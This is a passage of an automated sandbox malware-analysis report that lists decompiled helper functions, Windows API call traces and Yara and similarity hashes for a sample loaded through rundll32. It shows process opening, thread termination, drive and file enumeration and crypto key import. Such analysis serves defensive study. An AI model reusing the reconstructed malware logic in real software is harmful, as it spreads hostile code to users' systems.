                                                            • Part of subcall function 0627EE04: GetModuleHandleA.KERNEL32(?,0689978E,00000000,?,00000000), ref: 0627EE56
                                                            • Part of subcall function 0627EE04: GetProcAddress.KERNEL32(00000000), ref: 0627EE5D
                                                            • Part of subcall function 0627EE04: Thread32First.KERNEL32(?,0000001C), ref: 0627EE6D
                                                            • Part of subcall function 0627EE04: CloseHandle.KERNEL32(?), ref: 0627EEB5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                                          • String ID:
                                                          • API String ID: 2627809124-0
                                                          • Opcode ID: 37e600883e118537eb531446466869d0b334b5fbfabb44d4bf0ddbb58b46e957
                                                          • Instruction ID: 9a337acc0d304fd693291562373fd486f69b3c2d3c104040a92830365b5effd8
                                                          • Opcode Fuzzy Hash: 37e600883e118537eb531446466869d0b334b5fbfabb44d4bf0ddbb58b46e957
                                                          • Instruction Fuzzy Hash: 48016271A20305FF9B51DBA9ED88CDFB7EDEF992547000055F911A3100DA31AE04DB70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0629157A Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
                                                            • Part of subcall function 06291ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
                                                            • Part of subcall function 06291ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,062804AC,0628C384,00000000,00000000), ref: 062915F0
                                                            • Part of subcall function 06274963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,062770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 06274975
                                                            • Part of subcall function 06274963: StrChrA.SHLWAPI(?,00000020,?,00000000,062770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 06274984
                                                            • Part of subcall function 06273172: lstrlen.KERNEL32(062743C6,00000000,?,?,?,?,062743C6,00000035,00000000,?,00000000), ref: 062731A2
                                                            • Part of subcall function 06273172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 062731B8
                                                            • Part of subcall function 06273172: memcpy.NTDLL(00000010,062743C6,00000000,?,?,062743C6,00000035,00000000), ref: 062731EE
                                                            • Part of subcall function 06273172: memcpy.NTDLL(00000010,00000000,00000035,?,?,062743C6,00000035), ref: 06273209
                                                            • Part of subcall function 06273172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 06273227
                                                            • Part of subcall function 06273172: GetLastError.KERNEL32(?,?,062743C6,00000035), ref: 06273231
                                                            • Part of subcall function 06273172: HeapFree.KERNEL32(00000000,00000000,?,?,062743C6,00000035), ref: 06273254
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                                          • String ID:
                                                          • API String ID: 730886825-0
                                                          • Opcode ID: c2f8dc5219499aab8ddfbd9fc8d3739a2c2185f86414e2db068af80457bf673c
                                                          • Instruction ID: 8255ec97290b10e3dd388e841aa452cdeb5e38939ac289c6d19721a77d76a983
                                                          • Opcode Fuzzy Hash: c2f8dc5219499aab8ddfbd9fc8d3739a2c2185f86414e2db068af80457bf673c
                                                          • Instruction Fuzzy Hash: 76015E31A20305BBDB61D799EC4DF9E77EDEF8A750F000054BA01A6180DA70AA01DBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06284837 Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • memset.NTDLL ref: 06284855
                                                            • Part of subcall function 0628A451: memset.NTDLL ref: 0628A477
                                                            • Part of subcall function 0628A451: memcpy.NTDLL ref: 0628A49F
                                                            • Part of subcall function 0628A451: GetLastError.KERNEL32(00000010,00000218,0629386D,00000100,?,00000318,00000008), ref: 0628A4B6
                                                            • Part of subcall function 0628A451: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0629386D,00000100), ref: 0628A599
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastmemset$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 4290293647-0
                                                          • Opcode ID: 81db9c59ef9475ba12f4df8786a5a15e42049630fcf77dc5d10bc676783333d9
                                                          • Instruction ID: db91922d3a94f05241a4ad3f193bd8158f641b8a7040146b000d224b67728fd5
                                                          • Opcode Fuzzy Hash: 81db9c59ef9475ba12f4df8786a5a15e42049630fcf77dc5d10bc676783333d9
                                                          • Instruction Fuzzy Hash: AE01F23092235A6FD7A1BE29DC08F8A3BE8AB45254F008429FC5886280D771D904CAE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D155C Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D155C(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E036D12CA(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x36da2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E036D1B6F(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                                          0x036d155c
                                                          0x036d1564
                                                          0x036d157b
                                                          0x036d1596
                                                          0x036d159a
                                                          0x036d159f
                                                          0x036d15a1
                                                          0x036d15b3
                                                          0x036d15bf
                                                          0x036d15a3
                                                          0x036d15a3
                                                          0x036d15a8
                                                          0x036d15ad
                                                          0x036d15ad
                                                          0x036d15a1
                                                          0x036d15c5
                                                          0x036d15c9
                                                          0x036d15c9
                                                          0x036d1570
                                                          0x036d1575
                                                          0x036d1579
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 036D1B6F: SysFreeString.OLEAUT32(00000000), ref: 036D1BD2
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,76CDF710,?,00000000,?,00000000,?,036D21A9,?,004F0053,05969400,00000000,?), ref: 036D15BF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Free$HeapString
                                                          • String ID:
                                                          • API String ID: 3806048269-0
                                                          • Opcode ID: 0a1fea727550e850cc672d91a6699f4d11f2149f56085f59cb6c98448c23c5ca
                                                          • Instruction ID: 0acb9cacb048f54b00aa264fa2bccee8508963b19976f02f3bd8cba2fa8b3f6b
                                                          • Opcode Fuzzy Hash: 0a1fea727550e850cc672d91a6699f4d11f2149f56085f59cb6c98448c23c5ca
                                                          • Instruction Fuzzy Hash: B1014B72900619BBCF22DF94DC01EEA7BA6EF09750F088428FE069A224D771D960DBD4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D24B3 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E036D24B3(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E036D5FBB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E036D6D63(_a8 + _a8);
					if(_t21 != 0) {
						E036D298F(_a4, _t21, _t23);
					}
					E036D6C2C(_a4);
				}
				return _t21;
			}





                                                          0x036d24bb
                                                          0x036d24c2
                                                          0x036d24c4
                                                          0x036d24d3
                                                          0x036d24da
                                                          0x036d24e9
                                                          0x036d24ed
                                                          0x036d24f4
                                                          0x036d24f4
                                                          0x036d24fc
                                                          0x036d2501
                                                          0x036d2506

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,036D58D7,00000000,?,036D1D97,00000000,036D58D7,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D24C4
                                                            • Part of subcall function 036D5FBB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,036D24D8,00000001,036D58D7,00000000), ref: 036D5FF3
                                                            • Part of subcall function 036D5FBB: memcpy.NTDLL(036D24D8,036D58D7,00000010,?,?,?,036D24D8,00000001,036D58D7,00000000,?,036D1D97,00000000,036D58D7,?,75BCC740), ref: 036D600C
                                                            • Part of subcall function 036D5FBB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 036D6035
                                                            • Part of subcall function 036D5FBB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 036D604D
                                                            • Part of subcall function 036D5FBB: memcpy.NTDLL(00000000,75BCC740,059695B0,00000010), ref: 036D609F
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                                          • String ID:
                                                          • API String ID: 894908221-0
                                                          • Opcode ID: fe09e377e4c8dd58ad62edd12d3db9045c34dfa4ec3b6d8df3b98933430dd040
                                                          • Instruction ID: 751176b37d4999f4cc4d6c0dab3ebc37ef69b363ccd93d8ecc1ad3fc176caf05
                                                          • Opcode Fuzzy Hash: fe09e377e4c8dd58ad62edd12d3db9045c34dfa4ec3b6d8df3b98933430dd040
                                                          • Instruction Fuzzy Hash: 91F05E3A500209BBCF11AF65DD00CEB7FADEF85360B448026FD09CE114DB31DA559BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D74B6 Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D74B6(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E036D23D9(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E036D14F1(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                                          0x036d74be
                                                          0x036d74d8
                                                          0x00000000
                                                          0x036d74f4
                                                          0x036d74cf
                                                          0x036d74d6
                                                          0x00000000
                                                          0x00000000
                                                          0x036d74fb

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,036D363B,3D036D90,80000002,036D7168,036D7283,74666F53,4D4C4B48,036D7283,?,3D036D90,80000002,036D7168,?), ref: 036D74DB
                                                            • Part of subcall function 036D14F1: SysAllocString.OLEAUT32(036D7283), ref: 036D150A
                                                            • Part of subcall function 036D14F1: SysFreeString.OLEAUT32(00000000), ref: 036D154B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreelstrlen
                                                          • String ID:
                                                          • API String ID: 3808004451-0
                                                          • Opcode ID: d18d2cd558825feccd93942fc7f145d5901d6c344dbfd1cf33bb649d88d33e5c
                                                          • Instruction ID: 80f68beda79b8213271ea51977e6460f64f888490b7cd02f2ec27e9efb6dcfe9
                                                          • Opcode Fuzzy Hash: d18d2cd558825feccd93942fc7f145d5901d6c344dbfd1cf33bb649d88d33e5c
                                                          • Instruction Fuzzy Hash: 99F0923640020EBFDF02AF90ED05EEA7F6AAB18350F048018BA1458161D772C5B1EBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D2B23 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D2B23(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E036D2575(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E036D6C2C(_a4);
				}
				return _t12;
			}





                                                          0x036d2b2f
                                                          0x036d2b34
                                                          0x036d2b38
                                                          0x036d2b3f
                                                          0x036d2b4a
                                                          0x036d2b4e
                                                          0x036d2b4e
                                                          0x036d2b57

                                                          APIs
                                                            • Part of subcall function 036D2575: memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,036D4493,?), ref: 036D25AB
                                                            • Part of subcall function 036D2575: memset.NTDLL ref: 036D2621
                                                            • Part of subcall function 036D2575: memset.NTDLL ref: 036D2635
                                                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,036D4493,?,?,?,?), ref: 036D2B3F
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpymemset$FreeHeap
                                                          • String ID:
                                                          • API String ID: 3053036209-0
                                                          • Opcode ID: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                                                          • Instruction ID: aadc849bf3e867c8ff30b72de5cb437ff84e184831463a87950a1106a52c3f61
                                                          • Opcode Fuzzy Hash: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                                                          • Instruction Fuzzy Hash: 70E08C7AC0022876CB12AE94EC00DEBBF6CDF46691F048428FE088E200D632C61097E6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062773EB Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 062773F5
                                                            • Part of subcall function 06276261: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 062762A8
                                                            • Part of subcall function 06276261: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 062762BE
                                                            • Part of subcall function 06276261: RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 06276307
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Open$Closememset
                                                          • String ID:
                                                          • API String ID: 1685373161-0
                                                          • Opcode ID: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                                                          • Instruction ID: 91fd386a32754be6de007feafaf5433078757ccdd22557d91a45a846523b1704
                                                          • Opcode Fuzzy Hash: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                                                          • Instruction Fuzzy Hash: 2CE0C730210108BBDBC0BE88CC52F997BA8EF00340F008004BE186EA82CE31EA60C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06291E9D Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,062960E0,0000002C,062890D3,06898E36,?,00000000,0628A484,?,00000318), ref: 06291EB7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeVirtual
                                                          • String ID:
                                                          • API String ID: 1263568516-0
                                                          • Opcode ID: e642ca2dce14b9949eebf8d5557e62b2ce31bed936f0ebccb2dcd7a87d6e89f9
                                                          • Instruction ID: 7a1077e5eddf15addc8127bf0de3ffa76c0d1d25265fa620ad88f2917aae71c0
                                                          • Opcode Fuzzy Hash: e642ca2dce14b9949eebf8d5557e62b2ce31bed936f0ebccb2dcd7a87d6e89f9
                                                          • Instruction Fuzzy Hash: 57D01730E0161ADBCF61DB95DC4A99EFB71BF48720F608224E96073190C3301915CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 0628BAD1 Relevance: 28.7, APIs: 19, Instructions: 234stringfilesynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                            • Part of subcall function 062821B6: ExpandEnvironmentStringsW.KERNEL32(0627AEB5,00000000,00000000,00000001,00000000,00000000,0627E448,0627AEB5,00000000,0627E448,?), ref: 062821CD
                                                            • Part of subcall function 062821B6: ExpandEnvironmentStringsW.KERNEL32(0627AEB5,00000000,00000000,00000000), ref: 062821E7
                                                          • lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0628BB1D
                                                          • lstrlenW.KERNEL32(?,?,00000000), ref: 0628BB29
                                                          • memset.NTDLL ref: 0628BB71
                                                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BB8C
                                                          • lstrlenW.KERNEL32(0000002C), ref: 0628BBC4
                                                          • lstrlenW.KERNEL32(?), ref: 0628BBCC
                                                          • memset.NTDLL ref: 0628BBEF
                                                          • wcscpy.NTDLL ref: 0628BC01
                                                          • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0628BC27
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0628BC5D
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 0628BC79
                                                          • FindNextFileW.KERNEL32(?,00000000), ref: 0628BC92
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0628BCA4
                                                          • FindClose.KERNEL32(?), ref: 0628BCB9
                                                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BCCD
                                                          • lstrlenW.KERNEL32(0000002C), ref: 0628BCEF
                                                          • FindNextFileW.KERNEL32(?,00000000), ref: 0628BD65
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0628BD77
                                                          • FindClose.KERNEL32(?), ref: 0628BD92
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                                                          • String ID:
                                                          • API String ID: 2962561936-0
                                                          • Opcode ID: a842a1db202b8a32ed96ce24dd66a21b2f35b22b0c5e8ab7347a415b9f2389c9
                                                          • Instruction ID: d046da909be629d225ceaf9b98ba993790e7810dc2880acb08b8aa561c19f3f6
                                                          • Opcode Fuzzy Hash: a842a1db202b8a32ed96ce24dd66a21b2f35b22b0c5e8ab7347a415b9f2389c9
                                                          • Instruction Fuzzy Hash: 1D817B70915306AFD7A1EF24DC88A1BBBE9FF88305F04482DF995961A2DB74D805CF62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062710C7 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 130libraryloadernativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 062710FA
                                                          • GetLastError.KERNEL32 ref: 06271108
                                                          • NtSetInformationProcess.NTDLL ref: 06271162
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 062711A1
                                                          • GetProcAddress.KERNEL32(?), ref: 062711C2
                                                          • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 06271219
                                                          • CloseHandle.KERNEL32(?), ref: 0627122F
                                                          • CloseHandle.KERNEL32(?), ref: 06271255
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                                          • String ID: v
                                                          • API String ID: 3529370251-1801730948
                                                          • Opcode ID: ca06413dda146b97014b020df96330d675c75f0111fc7edefdad82a4fc9efd12
                                                          • Instruction ID: 4803e65f2cde4dc2ef4988a38fb3fc057e55272acd66f75c42475da50a11de3a
                                                          • Opcode Fuzzy Hash: ca06413dda146b97014b020df96330d675c75f0111fc7edefdad82a4fc9efd12
                                                          • Instruction Fuzzy Hash: 38419D70624346AFD7419F64E84DE1ABBF5FFCA308F040929FA55A6110D3708A59CFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627B238 Relevance: 18.5, APIs: 12, Instructions: 519memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B270
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B2A2
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B2D4
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B306
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B338
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B36A
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B39C
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B3CE
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B400
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0627B593
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0627B637
                                                            • Part of subcall function 06287736: RtlAllocateHeap.NTDLL ref: 06287777
                                                            • Part of subcall function 06287736: memset.NTDLL ref: 0628778B
                                                            • Part of subcall function 06287736: GetCurrentThreadId.KERNEL32 ref: 06287818
                                                            • Part of subcall function 06287736: GetCurrentThread.KERNEL32 ref: 0628782B
                                                            • Part of subcall function 06276537: RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 06276540
                                                            • Part of subcall function 06276537: HeapFree.KERNEL32(00000000,?), ref: 06276572
                                                            • Part of subcall function 06276537: RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 06276590
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0627B5DF
                                                            • Part of subcall function 0627D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0627DA7B,?), ref: 0627D4E3
                                                            • Part of subcall function 0627D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0627D506
                                                            • Part of subcall function 0627D4DA: memset.NTDLL ref: 0627D515
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3296958911-0
                                                          • Opcode ID: 35e3bd9abc1750b9160174819b3f68d9eb8f4cf707545b75c866901af40dccfa
                                                          • Instruction ID: 61c5f17008455ab1aaa08d5406f7943b43cf3d37e0d53992477e9a6bafc0de65
                                                          • Opcode Fuzzy Hash: 35e3bd9abc1750b9160174819b3f68d9eb8f4cf707545b75c866901af40dccfa
                                                          • Instruction Fuzzy Hash: 7EF183B2E31316AFDBD0EF78EC98D6F33D99B482417154925EE01DB240DA34E941DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627FD47 Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wcscpy.NTDLL ref: 0627FD7B
                                                          • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0627FD87
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0627FD98
                                                          • memset.NTDLL ref: 0627FDB5
                                                          • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 0627FDC3
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0627FDD1
                                                          • GetDriveTypeW.KERNEL32(?), ref: 0627FDDF
                                                          • lstrlenW.KERNEL32(?), ref: 0627FDEB
                                                          • wcscpy.NTDLL ref: 0627FDFD
                                                          • lstrlenW.KERNEL32(?), ref: 0627FE17
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627FE30
                                                          Memory Dump Source
